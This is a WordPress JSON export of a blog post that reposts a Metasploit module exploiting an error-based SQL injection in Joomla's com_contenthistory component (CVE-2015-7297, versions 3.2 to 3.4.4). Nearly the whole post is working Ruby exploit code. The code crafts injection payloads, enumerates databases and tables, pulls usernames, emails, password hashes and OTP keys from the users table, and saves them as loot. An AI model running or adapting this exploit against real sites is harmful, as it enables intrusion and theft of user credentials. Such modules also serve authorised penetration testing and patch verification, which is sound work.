{"id":59300,"date":"2024-08-31T23:40:44","date_gmt":"2024-08-31T20:40:44","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/180700\/joomla_contenthistory_sqli.rb.txt"},"modified":"2024-08-31T23:40:44","modified_gmt":"2024-08-31T20:40:44","slug":"joomla-com_contenthistory-error-based-sql-injection","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/joomla-com_contenthistory-error-based-sql-injection\/","title":{"rendered":"Joomla com_contenthistory Error-Based SQL Injection"},"content":{"rendered":"

##
# This module requires Metasploit: https:\/\/metasploit.com\/download
# Current source: https:\/\/github.com\/rapid7\/metasploit-framework
##<\/p>\n

class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient<\/p>\n

def initialize(info = {})
super(update_info(info,
‘Name’ => ‘Joomla com_contenthistory Error-Based SQL Injection’,
‘Description’ => %q{
This module exploits a SQL injection vulnerability in Joomla versions 3.2
through 3.4.4 in order to either enumerate usernames and password hashes.
},
‘References’ =>
[
[‘CVE’, ‘2015-7297’],
[‘URL’, ‘https:\/\/www.trustwave.com\/en-us\/resources\/blogs\/spiderlabs-blog\/joomla-sql-injection-vulnerability-exploit-results-in-full-administrative-access\/’]],
‘Author’ =>
[
‘Asaf Orpani’, # discovery
‘bperry’, # metasploit module
‘Nixawk’ # module review
],
‘License’ => MSF_LICENSE,
‘DisclosureDate’ => ‘2015-10-22’
))<\/p>\n

register_options(
[
OptString.new(‘TARGETURI’, [true, ‘The relative URI of the Joomla instance’, ‘\/’])
])
end<\/p>\n

def check
flag = Rex::Text.rand_text_alpha(8)
lmark = Rex::Text.rand_text_alpha(5)
rmark = Rex::Text.rand_text_alpha(5)<\/p>\n

payload = ‘AND (SELECT 8146 FROM(SELECT COUNT(*),CONCAT(‘
payload << “0x#{lmark.unpack(‘H*’)[0]},”
payload << “(SELECT 0x#{flag.unpack(‘H*’)[0]}),”
payload << “0x#{rmark.unpack(‘H*’)[0]},”
payload << ‘FLOOR(RAND(0)*2)’
payload << ‘)x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)’<\/p>\n

res = sqli(payload)<\/p>\n

if res && res.code == 500 && res.body =~ \/#{lmark}#{flag}#{rmark}\/
Msf::Exploit::CheckCode::Vulnerable
else
Msf::Exploit::CheckCode::Safe
end
end<\/p>\n

def request(query, payload, lmark, rmark)
query = “#{payload}” % query
res = sqli(query)<\/p>\n

# Error based SQL Injection
if res && res.code == 500 && res.body =~ \/#{lmark}(.*)#{rmark}\/
$1
end
end<\/p>\n

def query_databases(payload, lmark, rmark)
dbs = []\n

query = ‘(SELECT IFNULL(CAST(COUNT(schema_name) AS CHAR),0x20) ‘
query << ‘FROM INFORMATION_SCHEMA.SCHEMATA)’<\/p>\n

dbc = request(query, payload, lmark, rmark)<\/p>\n

query_fmt = ‘(SELECT MID((IFNULL(CAST(schema_name AS CHAR),0x20)),1,54) ‘
query_fmt << ‘FROM INFORMATION_SCHEMA.SCHEMATA LIMIT %d,1)’<\/p>\n

0.upto(dbc.to_i – 1) do |i|
dbname = request(query_fmt % i, payload, lmark, rmark)
dbs << dbname
vprint_good(dbname)
end<\/p>\n

%w(performance_schema information_schema mysql).each do |dbname|
dbs.delete(dbname) if dbs.include?(dbname)
end<\/p>\n

dbs
end<\/p>\n

def query_tables(database, payload, lmark, rmark)
tbs = []\n

query = ‘(SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) ‘
query << ‘FROM INFORMATION_SCHEMA.TABLES ‘
query << “WHERE table_schema IN (0x#{database.unpack(‘H*’)[0]}))”<\/p>\n

tbc = request(query, payload, lmark, rmark)<\/p>\n

query_fmt = ‘(SELECT MID((IFNULL(CAST(table_name AS CHAR),0x20)),1,54) ‘
query_fmt << ‘FROM INFORMATION_SCHEMA.TABLES ‘
query_fmt << “WHERE table_schema IN (0x#{database.unpack(‘H*’)[0]}) “
query_fmt << ‘LIMIT %d,1)’<\/p>\n

vprint_status(‘tables in database: %s’ % database)
0.upto(tbc.to_i – 1) do |i|
tbname = request(query_fmt % i, payload, lmark, rmark)
vprint_good(tbname)
tbs << tbname if tbname =~ \/_users$\/
end<\/p>\n

tbs
end<\/p>\n

def query_columns(database, table, payload, lmark, rmark)
cols = []query = “(SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM #{database}.#{table})”<\/p>\n

colc = request(query, payload, lmark, rmark)
vprint_status(colc)<\/p>\n

valid_cols = [ # joomla_users
‘activation’,
‘block’,
’email’,
‘id’,
‘lastResetTime’,
‘lastvisitDate’,
‘name’,
‘otep’,
‘otpKey’,
‘params’,
‘password’,
‘registerDate’,
‘requireReset’,
‘resetCount’,
‘sendEmail’,
‘username’
]\n

query_fmt = ‘(SELECT MID((IFNULL(CAST(%s AS CHAR),0x20)),%d,54) ‘
query_fmt << “FROM #{database}.#{table} ORDER BY id LIMIT %d,1)”<\/p>\n

0.upto(colc.to_i – 1) do |i|
record = {}
valid_cols.each do |col|
l = 1
record[col] = ”
loop do
value = request(query_fmt % [col, l, i], payload, lmark, rmark)
break if value.blank?
record[col] << value
l += 54
end
end
cols << record
vprint_status(record.to_s)
end<\/p>\n

cols
end<\/p>\n

def run
lmark = Rex::Text.rand_text_alpha(5)
rmark = Rex::Text.rand_text_alpha(5)<\/p>\n

payload = ‘AND (SELECT 6062 FROM(SELECT COUNT(*),CONCAT(‘
payload << “0x#{lmark.unpack(‘H*’)[0]},”
payload << ‘%s,’
payload << “0x#{rmark.unpack(‘H*’)[0]},”
payload << ‘FLOOR(RAND(0)*2)’
payload << ‘)x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)’<\/p>\n

dbs = query_databases(payload, lmark, rmark)
dbs.each do |db|
tables = query_tables(db, payload, lmark, rmark)
tables.each do |table|
cols = query_columns(db, table, payload, lmark, rmark)
next if cols.blank?
path = store_loot(
‘joomla.users’,
‘text\/plain’,
datastore[‘RHOST’],
cols.to_json,
‘joomla.users’)
print_good(‘Saved file to: ‘ + path)
end
end
end<\/p>\n

def sqli(payload)
send_request_cgi(
‘uri’ => normalize_uri(target_uri.path, ‘index.php’),
‘vars_get’ => {
‘option’ => ‘com_contenthistory’,
‘view’ => ‘history’,
‘list[ordering]’ => ”,
‘item_id’ => 1,
‘type_id’ => 1,
‘list[select]’ => ‘1 ‘ + payload
}
)
end
end<\/p>\n","protected":false},"excerpt":{"rendered":"

### This module requires Metasploit: https:\/\/metasploit.com\/download# Current source: https:\/\/github.com\/rapid7\/metasploit-framework## class MetasploitModule < Msf::Auxiliaryinclude Msf::Auxiliary::Reportinclude Msf::Exploit::Remote::HttpClient def initialize(info = {})super(update_info(info,‘Name’ => ‘Joomla com_contenthistory Error-Based SQL Injection’,‘Description’ => %q{This module exploits a SQL injection vulnerability in Joomla versions 3.2through 3.4.4 in order to either enumerate usernames and password hashes.},‘References’ =>[[‘CVE’, ‘2015-7297’],[‘URL’, ‘https:\/\/www.trustwave.com\/en-us\/resources\/blogs\/spiderlabs-blog\/joomla-sql-injection-vulnerability-exploit-results-in-full-administrative-access\/’]],‘Author’ =>[‘Asaf Orpani’, # discovery‘bperry’, # …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59300","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59300","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59300"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59300\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59300"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59300"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59300"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}